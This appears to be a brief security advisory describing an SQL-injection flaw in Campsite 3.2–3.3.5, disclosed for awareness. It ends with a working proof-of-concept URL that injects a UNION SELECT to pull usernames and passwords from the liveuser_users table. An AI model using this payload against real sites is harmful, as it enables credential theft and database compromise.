9 lines
No EOL
647 B
Text
9 lines
No EOL
647 B
Text
source: https://www.securityfocus.com/bid/39862/info
|
|
|
|
Campsite is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
|
|
|
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
|
|
Campsite versions 3.2 through 3.3.5 are vulnerable; other versions may also be affected.
|
|
|
|
http://www.example.com/javascript/tinymce/plugins/campsiteattachment/attachments.php?article_id=0+UNION+SELECT+Id,2,concat%28UName,0x2e,Password%29,4,5,6,7,8,9,10,11,12+FROM+liveuser_users+--+x |